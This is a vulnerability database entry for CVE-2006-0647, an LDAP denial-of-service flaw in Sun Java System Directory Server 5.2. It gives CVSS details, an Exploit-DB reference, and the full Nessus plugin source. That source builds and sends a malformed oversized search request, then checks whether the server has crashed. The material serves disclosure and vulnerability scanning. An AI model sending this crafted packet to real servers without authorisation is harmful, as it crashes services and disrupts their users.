Vulnerabilities > CVE-2006-0647 - Remote Denial Of Service vulnerability in SUN Java System Directory Server 5.2

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
sun
nessus
exploit available
NVD
Published: 2006-02-13
Updated: 2017-07-20

Summary

LDAP service in Sun Java System Directory Server 5.2, running on Linux and possibly other platforms, allows remote attackers to cause a denial of service (memory allocation error) via an LDAP packet with a crafted subtree search request, as demonstrated using the ProtoVer LDAP test suite.

Vulnerable Configurations

Part Description Count
Application
Sun
1

Exploit-Db

descriptionSun ONE Directory Server 5.2 Remote Denial Of Service Vulnerability. CVE-2006-0647. Dos exploits for multiple platform
idEDB-ID:27171
last seen2016-02-03
modified2006-02-08
published2006-02-08
reporterEvgeny Legerov
sourcehttps://www.exploit-db.com/download/27171/
titleSun ONE Directory Server 5.2 - Remote Denial of Service Vulnerability

Nessus

NASL familyDenial of Service
NASL idSUNONE_LDAP_DOS.NASL
descriptionThe remote host appears to be running Sun ONE Directory Server, an LDAP directory from Sun. The version of Sun ONE Directory Server fails to handle certain malformed search requests. A user can leverage this issue to crash not just the LDAP server but also the entire application on the remote host.
last seen2020-06-01
modified2020-06-02
plugin id20888
published2006-02-13
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20888
titleSun ONE Directory Server LDAP Malformed Packet DoS
code
#
# (C) Tenable Network Security
#

include("compat.inc");

if (description) {
  script_id(20888);
  script_version("1.17");

  script_cve_id("CVE-2006-0647");
  script_bugtraq_id(16550);

  script_name(english:"Sun ONE Directory Server LDAP Malformed Packet DoS");
  script_summary(english:"Checks for denial of service vulnerability in Sun ONE Directory Server");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote LDAP server is prone to denial of service attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running Sun ONE Directory Server, an
LDAP directory from Sun. 

The version of Sun ONE Directory Server fails to handle certain
malformed search requests.  A user can leverage this issue to crash
not just the LDAP server but also the entire application on the remote
host." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/dailydave/2006/q1/128" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Sun ONE Directory Server 5.2patch5." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/13");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/08");
 script_set_attribute(attribute:"patch_publication_date", value: "2006/05/19");
 script_cvs_date("Date: 2018/11/15 20:50:21");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("ldap_detect.nasl");
  script_require_ports("Services/ldap", 2571);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc: "ldap", default: 2571, exit_on_fail: 1);


# A bad request.
req = 
  raw_string(
    0x30,                              # universal sequence
    0x82, 0x9c, 0x78,                  # length of the request
    0x02, 0x01, 0x01,                  # message id (1)
    0x63,                              # search request
    0x82, 0x9c, 0x71,                  #   length
    0x04, 0x82, 0x9c, 0x55             #   search term
  ) +
  "dc=" + crap(data:"+", length:40000) + ",dc=example,dc=com" +
  raw_string(
    0x0a, 0x01, 0x02,                  #   scope (subtree)
    0x0a, 0x01, 0x00,                  #   dereference (never)
    0x02, 0x01, 0x00,                  #   size limit (0)
    0x02, 0x01, 0x00,                  #   time limit (0)
    0x01, 0x01, 0x00,                  #   attributes only (false)
    0xa2, 0x05, 0x87, 0x03,            #   filter (!(foo=*))
      "foo", 0x30, 0x00
  );


# Open a socket and send the request.
soc = open_sock_tcp(port);
if (! soc) exit(1);

send(socket:soc, data:req);
res = recv(socket:soc, length:1024);
close(soc);

# If we didn't get anything back, check whether it crashed.
if (res == NULL)
{
    # nb: at least under Windows, the server doesn't crash immediately.
    sleep(5);

    # There's a problem if we can't reconnect.
    if (service_is_dead(port: port) > 0)
    {
      security_warning(port);
      exit(0);
    }
}

References